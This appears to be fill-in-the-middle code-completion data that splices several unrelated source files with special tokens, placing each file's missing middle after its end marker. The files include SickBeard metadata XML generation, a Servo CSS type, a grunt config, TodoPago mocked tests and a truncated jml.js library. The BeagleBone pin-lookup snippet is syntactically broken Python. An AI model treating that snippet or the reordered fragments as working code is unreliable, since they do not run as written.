logger.log(u"Unable to find show with id " + str(show_obj.indexerid) + " on " + sickbeard.indexerApi( show_obj.indexer).name + ", skipping it", logger.ERROR) raise except sickbeard.indexer_error: logger.log( u"" + sickbeard.indexerApi(show_obj.indexer).name + " is down, can't use its data to make the NFO", logger.ERROR) raise # check for title and id if getattr(myShow, 'seriesname', None) is None or getattr(myShow, 'id', None) is None: logger.log(u"Incomplete info for show with id " + str(show_obj.indexerid) + " on " + sickbeard.indexerApi( show_obj.indexer).name + ", skipping it", logger.ERROR) return False indexerid = etree.SubElement(tv_node, "id") if getattr(myShow, 'id', None) is not None: indexerid.text = str(myShow['id']) indexer = etree.SubElement(tv_node, "indexer") if show_obj.indexer != None: indexer.text = str(show_obj.indexer) SeriesName = etree.SubElement(tv_node, "SeriesName") if getattr(myShow, 'seriesname', None) is not None: SeriesName.text = myShow['seriesname'] Status = etree.SubElement(tv_node, "Status") if getattr(myShow, 'status', None) is not None: Status.text = myShow['status'] Network = etree.SubElement(tv_node, "Network") if getattr(myShow, 'network', None) is not None: Network.text = myShow['network'] Airs_Time = etree.SubElement(tv_node, "Airs_Time") if getattr(myShow, 'airs_time', None) is not None: Airs_Time.text = myShow['airs_time'] Airs_DayOfWeek = etree.SubElement(tv_node, "Airs_DayOfWeek") if getattr(myShow, 'airs_dayofweek', None) is not None: Airs_DayOfWeek.text = myShow['airs_dayofweek'] FirstAired = etree.SubElement(tv_node, "FirstAired") if getattr(myShow, 'firstaired', None) is not None: FirstAired.text = myShow['firstaired'] ContentRating = etree.SubElement(tv_node, "ContentRating") MPAARating = etree.SubElement(tv_node, "MPAARating") certification = etree.SubElement(tv_node, "certification") if getattr(myShow, 'contentrating', None) is not None: ContentRating.text = myShow['contentrating'] MPAARating.text = myShow['contentrating'] certification.text = myShow['contentrating'] MetadataType = etree.SubElement(tv_node, "Type") MetadataType.text = "Series" Overview = etree.SubElement(tv_node, "Overview") if getattr(myShow, 'overview', None) is not None: Overview.text = myShow['overview'] PremiereDate = etree.SubElement(tv_node, "PremiereDate") if getattr(myShow, 'firstaired', None) is not None: PremiereDate.text = myShow['firstaired'] Rating = etree.SubElement(tv_node, "Rating") if getattr(myShow, 'rating', None) is not None: Rating.text = myShow['rating'] ProductionYear = etree.SubElement(tv_node, "ProductionYear") if getattr(myShow, 'firstaired', None) is not None: try: year_text = str(datetime.datetime.strptime(myShow['firstaired'], '%Y-%m-%d').year) if year_text: ProductionYear.text = year_text except: pass RunningTime = etree.SubElement(tv_node, "RunningTime") Runtime = etree.SubElement(tv_node, "Runtime") if getattr(myShow, 'runtime', None) is not None: RunningTime.text = myShow['runtime'] Runtime.text = myShow['runtime'] IMDB_ID = etree.SubElement(tv_node, "IMDB_ID") IMDB = etree.SubElement(tv_node, "IMDB") IMDbId = etree.SubElement(tv_node, "IMDbId") if getattr(myShow, 'imdb_id', None) is not None: IMDB_ID.text = myShow['imdb_id'] IMDB.text = myShow['imdb_id'] IMDbId.text = myShow['imdb_id'] Zap2ItId = etree.SubElement(tv_node, "Zap2ItId") if getattr(myShow, 'zap2it_id', None) is not None: Zap2ItId.text = myShow['zap2it_id'] Genres = etree.SubElement(tv_node, "Genres") for genre in myShow['genre'].split('|'): if genre: cur_genre = etree.SubElement(Genres, "Genre") cur_genre.text = genre Genre = etree.SubElement(tv_node, "Genre") if getattr(myShow, 'genre', None) is not None: Genre.text = "|".join([x for x in myShow["genre"].split('|') if x]) Studios = etree.SubElement(tv_node, "Studios") Studio = etree.SubElement(Studios, "Studio") if getattr(myShow, 'network', None) is not None: Studio.text = myShow['network'] Persons = etree.SubElement(tv_node, "Persons") if getattr(myShow, 'actors', None) is not None: for actor in myShow['_actors']: cur_actor = etree.SubElement(Persons, "Person") cur_actor_name = etree.SubElement(cur_actor, "Name") if getattr(actor, 'name', None): cur_actor_name.text = actor['name'].strip() cur_actor_type = etree.SubElement(cur_actor, "Type") cur_actor_type.text = "Actor" cur_actor_role = etree.SubElement(cur_actor, "Role") if getattr(actor, 'role', None): cur_actor_role.text = actor['role'] helpers.indentXML(tv_node) data = etree.ElementTree(tv_node) return data def _ep_data(self, ep_obj): """ Creates an elementTree XML structure for a MediaBrowser style episode.xml and returns the resulting data object. show_obj: a TVShow instance to create the NFO for """ eps_to_write = [ep_obj] + ep_obj.relatedEps persons_dict = {} persons_dict['Director'] = [] persons_dict['GuestStar'] = [] persons_dict['Writer'] = [] indexer_lang = ep_obj.show.lang try: lINDEXER_API_PARMS = sickbeard.indexerApi(ep_obj.show.indexer).api_params.copy() lINDEXER_API_PARMS['actors'] = True if indexer_lang and not indexer_lang == 'en': lINDEXER_API_PARMS['language'] = indexer_lang if ep_obj.show.dvdorder != 0: lINDEXER_API_PARMS['dvdorder'] = True t = sickbeard.indexerApi(ep_obj.show.indexer).indexer(**lINDEXER_API_PARMS)<|fim▁hole|> myShow = t[ep_obj.show.indexerid] except sickbeard.indexer_shownotfound, e: raise exceptions.ShowNotFoundException(e.message) except sickbeard.indexer_error, e: logger.log(u"Unable to connect to " + sickbeard.indexerApi( ep_obj.show.indexer).name + " while creating meta files - skipping - " + ex(e), logger.ERROR) return False rootNode = etree.Element("Item") # write an MediaBrowser XML containing info for all matching episodes for curEpToWrite in eps_to_write: try: myEp = myShow[curEpToWrite.season][curEpToWrite.episode] except (sickbeard.indexer_episodenotfound, sickbeard.indexer_seasonnotfound): logger.log(u"Unable to find episode " + str(curEpToWrite.season) + "x" + str( curEpToWrite.episode) + " on " + sickbeard.indexerApi( ep_obj.show.indexer).name + ".. has it been removed? Should I delete from db?") return None if curEpToWrite == ep_obj: # root (or single) episode # default to today's date for specials if firstaired is not set if getattr(myEp, 'firstaired', None) is None and ep_obj.season == 0: myEp['firstaired'] = str(datetime.date.fromordinal(1)) if getattr(myEp, 'episodename', None) is None or getattr(myEp, 'firstaired', None) is None: return None episode = rootNode EpisodeName = etree.SubElement(episode, "EpisodeName") if curEpToWrite.name != None: EpisodeName.text = curEpToWrite.name else: EpisodeName.text = "" EpisodeNumber = etree.SubElement(episode, "EpisodeNumber") EpisodeNumber.text = str(ep_obj.episode) if ep_obj.relatedEps: EpisodeNumberEnd = etree.SubElement(episode, "EpisodeNumberEnd") EpisodeNumberEnd.text = str(curEpToWrite.episode) SeasonNumber = etree.SubElement(episode, "SeasonNumber") SeasonNumber.text = str(curEpToWrite.season) if not ep_obj.relatedEps: absolute_number = etree.SubElement(episode, "absolute_number") if getattr(myEp, 'absolute_number', None) is not None: absolute_number.text = myEp['absolute_number'] FirstAired = etree.SubElement(episode, "FirstAired") if curEpToWrite.airdate != datetime.date.fromordinal(1): FirstAired.text = str(curEpToWrite.airdate) else: FirstAired.text = "" MetadataType = etree.SubElement(episode, "Type") MetadataType.text = "Episode" Overview = etree.SubElement(episode, "Overview") if curEpToWrite.description != None: Overview.text = curEpToWrite.description else: Overview.text = "" if not ep_obj.relatedEps: Rating = etree.SubElement(episode, "Rating") if getattr(myEp, 'rating', None) is not None: Rating.text = myEp['rating'] IMDB_ID = etree.SubElement(episode, "IMDB_ID") IMDB = etree.SubElement(episode, "IMDB") IMDbId = etree.SubElement(episode, "IMDbId") if getattr(myShow, 'imdb_id', None) is not None: IMDB_ID.text = myShow['imdb_id'] IMDB.text = myShow['imdb_id'] IMDbId.text = myShow['imdb_id'] indexerid = etree.SubElement(episode, "id") indexerid.text = str(curEpToWrite.indexerid) indexer = etree.SubElement(episode, "indexer") indexer.text = str(curEpToWrite.show.indexer) Persons = etree.SubElement(episode, "Persons") Language = etree.SubElement(episode, "Language") try: Language.text = myEp['language'] except: Language.text = 'en' # tvrage api doesn't provide language so we must assume a value here thumb = etree.SubElement(episode, "filename") # TODO: See what this is needed for.. if its still needed # just write this to the NFO regardless of whether it actually exists or not # note: renaming files after nfo generation will break this, tough luck thumb_text = self.get_episode_thumb_path(ep_obj) if thumb_text: thumb.text = thumb_text else: # append data from (if any) related episodes EpisodeNumberEnd.text = str(curEpToWrite.episode) if curEpToWrite.name: if not EpisodeName.text: EpisodeName.text = curEpToWrite.name else: EpisodeName.text = EpisodeName.text + ", " + curEpToWrite.name if curEpToWrite.description: if not Overview.text: Overview.text = curEpToWrite.description else: Overview.text = Overview.text + "\r" + curEpToWrite.description # collect all directors, guest stars and writers if getattr(myEp, 'director', None) is not None: persons_dict['Director'] += [x.strip() for x in myEp['director'].split('|') if x] if getattr(myEp, 'gueststars', None) is not None: persons_dict['GuestStar'] += [x.strip() for x in myEp['gueststars'].split('|') if x] if getattr(myEp, 'writer', None) is not None: persons_dict['Writer'] += [x.strip() for x in myEp['writer'].split('|') if x] # fill in Persons section with collected directors, guest starts and writers for person_type, names in persons_dict.iteritems(): # remove doubles names = list(set(names)) for cur_name in names: Person = etree.SubElement(Persons, "Person") cur_person_name = etree.SubElement(Person, "Name") cur_person_name.text = cur_name cur_person_type = etree.SubElement(Person, "Type") cur_person_type.text = person_type helpers.indentXML(rootNode) data = etree.ElementTree(rootNode) return data # present a standard "interface" from the module metadata_class = MediaBrowserMetadata<|fim▁end|>
<|file_name|>position.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ //! Generic types for CSS handling of specified and computed values of //! [`position`](https://drafts.csswg.org/css-backgrounds-3/#position) /// A generic type for representing a CSS [position](https://drafts.csswg.org/css-values/#position). #[derive(Animate, Clone, ComputeSquaredDistance, Copy, Debug, MallocSizeOf, PartialEq, ToAnimatedZero, ToComputedValue)] pub struct Position<H, V> { /// The horizontal component of position. pub horizontal: H, /// The vertical component of position. pub vertical: V, } impl<H, V> Position<H, V> { /// Returns a new position. pub fn new(horizontal: H, vertical: V) -> Self { Self { horizontal: horizontal, vertical: vertical, } } } /// A generic value for the `z-index` property. #[derive(Animate, Clone, ComputeSquaredDistance, Copy, Debug, MallocSizeOf, PartialEq, ToAnimatedZero, ToComputedValue, ToCss)] pub enum ZIndex<Integer> { /// An integer value. Integer(Integer), /// The keyword `auto`. Auto, } impl<Integer> ZIndex<Integer> { /// Returns `auto` #[inline] pub fn auto() -> Self { ZIndex::Auto } <|fim▁hole|> /// Returns whether `self` is `auto`. #[inline] pub fn is_auto(self) -> bool { matches!(self, ZIndex::Auto) } /// Returns the integer value if it is an integer, or `auto`. #[inline] pub fn integer_or(self, auto: Integer) -> Integer { match self { ZIndex::Integer(n) => n, ZIndex::Auto => auto, } } }<|fim▁end|>
<|file_name|>cssmin.js<|end_file_name|><|fim▁begin|>'use strict'; var path = require('path'); exports.name = 'cssmin'; // // Output a config for the furnished block // The context variable is used both to take the files to be treated // (inFiles) and to output the one(s) created (outFiles). // It aslo conveys whether or not the current process is the last of the pipe // exports.createConfig = function(context, block) { var cfg = {files: []}; // FIXME: check context has all the needed info var outfile = path.join(context.outDir, block.dest); // Depending whether or not we're the last of the step we're not going to output the same thing var files = {}; files.dest = outfile; files.src = [];<|fim▁hole|> context.outFiles = [block.dest]; return cfg; };<|fim▁end|>
context.inFiles.forEach(function(f) { files.src.push(path.join(context.inDir, f));} ); cfg.files.push(files);
<|file_name|>beaglebone-black.py<|end_file_name|><|fim▁begin|># # Get the pin which correlates with a given purpose. # # @param char array purpose # The purpose to search by. # @return int # A pin which can be used for the given purpose. # def getPin(purpose): purpose_collection = { "i2c-data": 20<|fim▁hole|> "adc": 39 "adc0": 39 "adc-0": 39 "one-wire-data": 40 "adc1": 40 "adc-1": 40 "spi-slave-select": 28 "spi-master-out-slave-in": 30 "spi-master-in-slave-out": 29 "spi-clock": 31 } if purpose in purpose_collection: return purpose_collection[purpose] else return -1<|fim▁end|>
"i2c-clock": 19
<|file_name|>PSYM_ENUMERATESYMBOLS_CALLBACK.hpp<|end_file_name|><|fim▁begin|><|fim▁hole|>#pragma once #include <common/common.h> START_ATF_NAMESPACE typedef int (WINAPIV *PSYM_ENUMERATESYMBOLS_CALLBACK)(_SYMBOL_INFO *, unsigned int, void *); END_ATF_NAMESPACE<|fim▁end|>
// This file auto generated by plugin for ida pro. Generated code only for x64. Please, dont change manually
<|file_name|>SendAuthorizeRequestTest.py<|end_file_name|><|fim▁begin|># pylint: disable-all # flake8: noqa import sys sys.path.append("..") from todopagoconnector import TodoPagoConnector from SendAuthorizeRequestData import SendAuthorizeRequestData import unittest from unittest import TestCase if sys.version_info[0] >= 3: from unittest.mock import patch, Mock else: from mock import patch, Mock, MagicMock class SendAuthorizeRequestTest(TestCase): @patch('todopagoconnector.TodoPagoConnector') def test_get_credentials_ok(self, MockTodoPagoConnector): j_header_http = { 'Authorization': 'TODOPAGO f3d8b72c94ab4a06be2ef7c95490f7d3' } MTPConnector = MockTodoPagoConnector(j_header_http, "test") instanceSARData = SendAuthorizeRequestData() MTPConnector.sendAuthorize.return_value = instanceSARData.send_authorize_request_ok_response() responseSAR = MTPConnector.sendAuthorize( instanceSARData.get_options_SAR_comercio_params(), instanceSARData.get_options_SAR_operation_params()) self.assertEqual(responseSAR['StatusCode'], -1) @patch('todopagoconnector.TodoPagoConnector') def test_get_credentials_fail(self, MockTodoPagoConnector): j_header_http = { 'Authorization': 'TODOPAGO f3d8b72c94ab4a06be2ef7c95490f7d3' } MTPConnector = MockTodoPagoConnector(j_header_http, "test") instanceSAR = SendAuthorizeRequestData() MTPConnector.sendAuthorize.return_value = instanceSAR.send_authorize_request_fail_response() responseSAR = MTPConnector.sendAuthorize( instanceSAR.get_options_SAR_comercio_params(),<|fim▁hole|> @patch('todopagoconnector.TodoPagoConnector') def test_get_credentials_702(self, MockTodoPagoConnector): j_header_http = { 'Authorization': 'TODOPAGO f3d8b72c94ab4a06be2ef7c95490f7d3' } MTPConnector = MockTodoPagoConnector(j_header_http, "test") instanceSAR = SendAuthorizeRequestData() MTPConnector.sendAuthorize.return_value = instanceSAR.send_authorize_request_702_response() responseSAR = MTPConnector.sendAuthorize( instanceSAR.get_options_SAR_comercio_params(), instanceSAR.get_options_SAR_operation_params()) self.assertNotEquals(responseSAR['StatusCode'], -1) if __name__ == '__main__': unittest.main()<|fim▁end|>
instanceSAR.get_options_SAR_operation_params()) self.assertNotEquals(responseSAR['StatusCode'], -1)
<|file_name|>EncryptedData.java<|end_file_name|><|fim▁begin|>package org.bouncycastle.asn1.cms; import org.bouncycastle.asn1.ASN1EncodableVector; import org.bouncycastle.asn1.ASN1Integer; import org.bouncycastle.asn1.ASN1Object; import org.bouncycastle.asn1.ASN1Primitive; import org.bouncycastle.asn1.ASN1Sequence; import org.bouncycastle.asn1.ASN1Set; import org.bouncycastle.asn1.BERSequence; import org.bouncycastle.asn1.BERTaggedObject; public class EncryptedData extends ASN1Object { private ASN1Integer version; private EncryptedContentInfo encryptedContentInfo; private ASN1Set unprotectedAttrs; public static EncryptedData getInstance(Object o) { if (o instanceof EncryptedData) { return (EncryptedData)o; } if (o != null) { return new EncryptedData(ASN1Sequence.getInstance(o)); } return null; } public EncryptedData(EncryptedContentInfo encInfo) { this(encInfo, null); } public EncryptedData(EncryptedContentInfo encInfo, ASN1Set unprotectedAttrs) { this.version = new ASN1Integer((unprotectedAttrs == null) ? 0 : 2); this.encryptedContentInfo = encInfo; this.unprotectedAttrs = unprotectedAttrs; } private EncryptedData(ASN1Sequence seq) { this.version = ASN1Integer.getInstance(seq.getObjectAt(0)); this.encryptedContentInfo = EncryptedContentInfo.getInstance(seq.getObjectAt(1)); if (seq.size() == 3) { this.unprotectedAttrs = ASN1Set.getInstance(seq.getObjectAt(2)); } } public ASN1Integer getVersion() { return version; } public EncryptedContentInfo getEncryptedContentInfo() { return encryptedContentInfo; } public ASN1Set getUnprotectedAttrs() { return unprotectedAttrs; } <|fim▁hole|> * EncryptedData ::= SEQUENCE { * version CMSVersion, * encryptedContentInfo EncryptedContentInfo, * unprotectedAttrs [1] IMPLICIT UnprotectedAttributes OPTIONAL } * </pre> * @return a basic ASN.1 object representation. */ public ASN1Primitive toASN1Primitive() { ASN1EncodableVector v = new ASN1EncodableVector(); v.add(version); v.add(encryptedContentInfo); if (unprotectedAttrs != null) { v.add(new BERTaggedObject(false, 1, unprotectedAttrs)); } return new BERSequence(v); } }<|fim▁end|>
/** * <pre>
<|file_name|>jml.js<|end_file_name|><|fim▁begin|>var _typeof = typeof Symbol === "function" && typeof Symbol.iterator === "symbol" ? function (obj) { return typeof obj; } : function (obj) { return obj && typeof Symbol === "function" && obj.constructor === Symbol && obj !== Symbol.prototype ? "symbol" : typeof obj; }; var classCallCheck = function (instance, Constructor) { if (!(instance instanceof Constructor)) { throw new TypeError("Cannot call a class as a function"); } }; var createClass = function () { function defineProperties(target, props) { for (var i = 0; i < props.length; i++) { var descriptor = props[i]; descriptor.enumerable = descriptor.enumerable || false; descriptor.configurable = true; if ("value" in descriptor) descriptor.writable = true; Object.defineProperty(target, descriptor.key, descriptor); } } return function (Constructor, protoProps, staticProps) { if (protoProps) defineProperties(Constructor.prototype, protoProps); if (staticProps) defineProperties(Constructor, staticProps); return Constructor; }; }(); var get = function get(object, property, receiver) { if (object === null) object = Function.prototype; var desc = Object.getOwnPropertyDescriptor(object, property); if (desc === undefined) { var parent = Object.getPrototypeOf(object); if (parent === null) { return undefined; } else { return get(parent, property, receiver); } } else if ("value" in desc) { return desc.value; } else { var getter = desc.get; if (getter === undefined) { return undefined; } return getter.call(receiver); } }; var inherits = function (subClass, superClass) { if (typeof superClass !== "function" && superClass !== null) { throw new TypeError("Super expression must either be null or a function, not " + typeof superClass); } subClass.prototype = Object.create(superClass && superClass.prototype, { constructor: { value: subClass, enumerable: false, writable: true, configurable: true } }); if (superClass) Object.setPrototypeOf ? Object.setPrototypeOf(subClass, superClass) : subClass.__proto__ = superClass; }; var possibleConstructorReturn = function (self, call) { if (!self) { throw new ReferenceError("this hasn't been initialised - super() hasn't been called"); } return call && (typeof call === "object" || typeof call === "function") ? call : self; }; var slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }(); var toConsumableArray = function (arr) { if (Array.isArray(arr)) { for (var i = 0, arr2 = Array(arr.length); i < arr.length; i++) arr2[i] = arr[i]; return arr2; } else { return Array.from(arr); } }; /* Possible todos: 0. Add XSLT to JML-string stylesheet (or even vice versa) 0. IE problem: Add JsonML code to handle name attribute (during element creation) 0. Element-specific: IE object-param handling Todos inspired by JsonML: https://github.com/mckamey/jsonml/blob/master/jsonml-html.js 0. duplicate attributes? 0. expand ATTR_MAP 0. equivalent of markup, to allow strings to be embedded within an object (e.g., {$value: '<div>id</div>'}); advantage over innerHTML in that it wouldn't need to work as the entire contents (nor destroy any existing content or handlers) 0. More validation? 0. JsonML DOM Level 0 listener 0. Whitespace trimming? JsonML element-specific: 0. table appending 0. canHaveChildren necessary? (attempts to append to script and img) Other Todos: 0. Note to self: Integrate research from other jml notes 0. Allow Jamilih to be seeded with an existing element, so as to be able to add/modify attributes and children 0. Allow array as single first argument 0. Settle on whether need to use null as last argument to return array (or fragment) or other way to allow appending? Options object at end instead to indicate whether returning array, fragment, first element, etc.? 0. Allow building of generic XML (pass configuration object) 0. Allow building content internally as a string (though allowing DOM methods, etc.?) 0. Support JsonML empty string element name to represent fragments? 0. Redo browser testing of jml (including ensuring IE7 can work even if test framework can't work) */ var win = typeof window !== 'undefined' && window; var doc = typeof document !== 'undefined' && document; var XmlSerializer = typeof XMLSerializer !== 'undefined' && XMLSerializer; // STATIC PROPERTIES var possibleOptions = ['$plugins', '$map' // Add any other options here ]; var NS_HTML = 'http://www.w3.org/1999/xhtml', hyphenForCamelCase = /-([a-z])/g; var ATTR_MAP = { 'readonly': 'readOnly' }; // We define separately from ATTR_DOM for clarity (and parity with JsonML) but no current need // We don't set attribute esp. for boolean atts as we want to allow setting of `undefined` // (e.g., from an empty variable) on templates to have no effect var BOOL_ATTS = ['checked', 'defaultChecked', 'defaultSelected', 'disabled', 'indeterminate', 'open', // Dialog elements 'readOnly', 'selected']; var ATTR_DOM = BOOL_ATTS.concat([// From JsonML 'accessKey', // HTMLElement 'async', 'autocapitalize', // HTMLElement 'autofocus', 'contentEditable', // HTMLElement through ElementContentEditable 'defaultValue', 'defer', 'draggable', // HTMLElement 'formnovalidate', 'hidden', // HTMLElement 'innerText', // HTMLElement 'inputMode', // HTMLElement through ElementContentEditable 'ismap', 'multiple', 'novalidate', 'pattern', 'required', 'spellcheck', // HTMLElement 'translate', // HTMLElement 'value', 'willvalidate']); // Todo: Add more to this as useful for templating // to avoid setting through nullish value var NULLABLES = ['dir', // HTMLElement 'lang', // HTMLElement 'max', 'min', 'title' // HTMLElement ]; var $ = function $(sel) { return doc.querySelector(sel); }; var $$ = function $$(sel) { return [].concat(toConsumableArray(doc.querySelectorAll(sel))); }; /** * Retrieve the (lower-cased) HTML name of a node * @static * @param {Node} node The HTML node * @returns {String} The lower-cased node name */ function _getHTMLNodeName(node) { return node.nodeName && node.nodeName.toLowerCase(); } /** * Apply styles if this is a style tag * @static * @param {Node} node The element to check whether it is a style tag */ function _applyAnyStylesheet(node) { if (!doc.createStyleSheet) { return; } if (_getHTMLNodeName(node) === 'style') { // IE var ss = doc.createStyleSheet(); // Create a stylesheet to actually do something useful ss.cssText = node.cssText; // We continue to add the style tag, however } } /** * Need this function for IE since options weren't otherwise getting added * @private * @static * @param {DOMElement} parent The parent to which to append the element * @param {DOMNode} child The element or other node to append to the parent */ function _appendNode(parent, child) { var parentName = _getHTMLNodeName(parent); var childName = _getHTMLNodeName(child); if (doc.createStyleSheet) { if (parentName === 'script') { parent.text = child.nodeValue; return; } if (parentName === 'style') { parent.cssText = child.nodeValue; // This will not apply it--just make it available within the DOM cotents return; } } if (parentName === 'template') { parent.content.appendChild(child); return; } try { parent.appendChild(child); // IE9 is now ok with this } catch (e) { if (parentName === 'select' && childName === 'option') { try { // Since this is now DOM Level 4 standard behavior (and what IE7+ can handle), we try it first parent.add(child); } catch (err) { // DOM Level 2 did require a second argument, so we try it too just in case the user is using an older version of Firefox, etc. parent.add(child, null); // IE7 has a problem with this, but IE8+ is ok } return; } throw e; } } /** * Attach event in a cross-browser fashion * @static * @param {DOMElement} el DOM element to which to attach the event * @param {String} type The DOM event (without 'on') to attach to the element * @param {Function} handler The event handler to attach to the element * @param {Boolean} [capturing] Whether or not the event should be * capturing (W3C-browsers only); default is false; NOT IN USE */ function _addEvent(el, type, handler, capturing) { el.addEventListener(type, handler, !!capturing); } /** * Creates a text node of the result of resolving an entity or character reference * @param {'entity'|'decimal'|'hexadecimal'} type Type of reference * @param {String} prefix Text to prefix immediately after the "&" * @param {String} arg The body of the reference * @returns {Text} The text node of the resolved reference */ function _createSafeReference(type, prefix, arg) { // For security reasons related to innerHTML, we ensure this string only contains potential entity characters if (!arg.match(/^\w+$/)) { throw new TypeError('Bad ' + type); } var elContainer = doc.createElement('div'); // Todo: No workaround for XML? elContainer.textContent = '&' + prefix + arg + ';'; return doc.createTextNode(elContainer.textContent); } /** * @param {String} n0 Whole expression match (including "-") * @param {String} n1 Lower-case letter match * @returns {String} Uppercased letter */ function _upperCase(n0, n1) { return n1.toUpperCase(); } /** * @private * @static */ function _getType(item) { if (typeof item === 'string') { return 'string'; } if ((typeof item === 'undefined' ? 'undefined' : _typeof(item)) === 'object') { if (item === null) { return 'null'; } if (Array.isArray(item)) { return 'array'; } if ('nodeType' in item) { if (item.nodeType === 1) { return 'element'; } if (item.nodeType === 11) { return 'fragment'; } } return 'object'; } return undefined; } /** * @private * @static */ function _fragReducer(frag, node) { frag.appendChild(node); return frag; } /** * @private * @static */ function _replaceDefiner(xmlnsObj) { return function (n0) { var retStr = xmlnsObj[''] ? ' xmlns="' + xmlnsObj[''] + '"' : n0 || ''; // Preserve XHTML for (var ns in xmlnsObj) { if (xmlnsObj.hasOwnProperty(ns)) { if (ns !== '') { retStr += ' xmlns:' + ns + '="' + xmlnsObj[ns] + '"'; } } } return retStr; }; } function _optsOrUndefinedJML() { for (var _len = arguments.length, args = Array(_len), _key = 0; _key < _len; _key++) { args[_key] = arguments[_key]; } return jml.apply(undefined, toConsumableArray(args[0] === undefined ? args.slice(1) : args)); } /** * @private * @static */ function _jmlSingleArg(arg) { return jml(arg); } /** * @private * @static */ function _copyOrderedAtts(attArr) { var obj = {}; // Todo: Fix if allow prefixed attributes obj[attArr[0]] = attArr[1]; // array of ordered attribute-value arrays return obj; } /** * @private * @static */ function _childrenToJML(node) { return function (childNodeJML, i) { var cn = node.childNodes[i]; var j = Array.isArray(childNodeJML) ? jml.apply(undefined, toConsumableArray(childNodeJML)) : jml(childNodeJML); cn.parentNode.replaceChild(j, cn); }; } /** * @private * @static */ function _appendJML(node) { return function (childJML) { node.appendChild(jml.apply(undefined, toConsumableArray(childJML))); }; } /** * @private * @static */ function _appendJMLOrText(node) { return function (childJML) { if (typeof childJML === 'string') { node.appendChild(doc.createTextNode(childJML)); } else { node.appendChild(jml.apply(undefined, toConsumableArray(childJML))); } }; } /** * @private * @static function _DOMfromJMLOrString (childNodeJML) { if (typeof childNodeJML === 'string') { return doc.createTextNode(childNodeJML); } return jml(...childNodeJML); } */ /** * Creates an XHTML or HTML element (XHTML is preferred, but only in browsers that support); * Any element after element can be omitted, and any subsequent type or types added afterwards * @requires polyfill: Array.isArray * @requires polyfill: Array.prototype.reduce For returning a document fragment * @requires polyfill: Element.prototype.dataset For dataset functionality (Will not work in IE <= 7) * @param {String} el The element to create (by lower-case name) * @param {Object} [atts] Attributes to add with the key as the attribute name and value as the * attribute value; important for IE where the input element's type cannot * be added later after already added to the page * @param {DOMElement[]} [children] The optional children of this element (but raw DOM elements * required to be specified within arrays since * could not otherwise be distinguished from siblings being added) * @param {DOMElement} [parent] The optional parent to which to attach the element (always the last * unless followed by null, in which case it is the second-to-last) * @param {null} [returning] Can use null to indicate an array of elements should be returned * @returns {DOMElement} The newly created (and possibly already appended) element or array of elements */ var jml = function jml() { for (var _len2 = arguments.length, args = Array(_len2), _key2 = 0; _key2 < _len2; _key2++) { args[_key2] = arguments[_key2]; } var elem = doc.createDocumentFragment(); function _checkAtts(atts) { var att = void 0; for (att in atts) { if (!atts.hasOwnProperty(att)) { continue; } var attVal = atts[att]; att = att in ATTR_MAP ? ATTR_MAP[att] : att; if (NULLABLES.includes(att)) { if (attVal != null) { elem[att] = attVal; } continue; } else if (ATTR_DOM.includes(att)) { elem[att] = attVal; continue; } switch (att) { /* Todos: 0. JSON mode to prevent event addition 0. {$xmlDocument: []} // doc.implementation.createDocument 0. Accept array for any attribute with first item as prefix and second as value? 0. {$: ['xhtml', 'div']} for prefixed elements case '$': // Element with prefix? nodes[nodes.length] = elem = doc.createElementNS(attVal[0], attVal[1]); break; */ case '#': { // Document fragment nodes[nodes.length] = _optsOrUndefinedJML(opts, attVal); break; }case '$shadow': { var open = attVal.open, closed = attVal.closed; var content = attVal.content, template = attVal.template; var shadowRoot = elem.attachShadow({ mode: closed || open === false ? 'closed' : 'open' }); if (template) { if (Array.isArray(template)) { if (_getType(template[0]) === 'object') { // Has attributes template = jml.apply(undefined, ['template'].concat(toConsumableArray(template), [doc.body])); } else { // Array is for the children template = jml('template', template, doc.body); } } else if (typeof template === 'string') { template = $(template); } jml(template.content.cloneNode(true), shadowRoot); } else { if (!content) { content = open || closed; } if (content && typeof content !== 'boolean') { if (Array.isArray(content)) { jml({ '#': content }, shadowRoot); } else { jml(content, shadowRoot); } } } break; }case 'is': { // Not yet supported in browsers // Handled during element creation break; }case '$custom': { Object.assign(elem, attVal); break; }case '$define': { var _ret = function () { var localName = elem.localName.toLowerCase(); // Note: customized built-ins sadly not working yet var customizedBuiltIn = !localName.includes('-'); var def = customizedBuiltIn ? elem.getAttribute('is') : localName; if (customElements.get(def)) { return 'break'; } var getConstructor = function getConstructor(cb) { var baseClass = options && options.extends ? doc.createElement(options.extends).constructor : customizedBuiltIn ? doc.createElement(localName).constructor : HTMLElement; return cb ? function (_baseClass) { inherits(_class, _baseClass); function _class() { classCallCheck(this, _class); var _this = possibleConstructorReturn(this, (_class.__proto__ || Object.getPrototypeOf(_class)).call(this)); cb.call(_this); return _this; } return _class; }(baseClass) : function (_baseClass2) { inherits(_class2, _baseClass2); function _class2() { classCallCheck(this, _class2); return possibleConstructorReturn(this, (_class2.__proto__ || Object.getPrototypeOf(_class2)).apply(this, arguments)); } return _class2; }(baseClass); }; var constructor = void 0, options = void 0, prototype = void 0; if (Array.isArray(attVal)) { if (attVal.length <= 2) { var _attVal = slicedToArray(attVal, 2); constructor = _attVal[0]; options = _attVal[1]; if (typeof options === 'string') { options = { extends: options }; } else if (!options.hasOwnProperty('extends')) { prototype = options; } if ((typeof constructor === 'undefined' ? 'undefined' : _typeof(constructor)) === 'object') { prototype = constructor; constructor = getConstructor(); } } else { var _attVal2 = slicedToArray(attVal, 3); constructor = _attVal2[0]; prototype = _attVal2[1]; options = _attVal2[2]; if (typeof options === 'string') { options = { extends: options }; } } } else if (typeof attVal === 'function') { constructor = attVal; } else { prototype = attVal; constructor = getConstructor(); } if (!constructor.toString().startsWith('class')) { constructor = getConstructor(constructor); } if (!options && customizedBuiltIn) { options = { extends: localName }; } if (prototype) { Object.assign(constructor.prototype, prototype); } customElements.define(def, constructor, customizedBuiltIn ? options : undefined); return 'break'; }(); if (_ret === 'break') break; }case 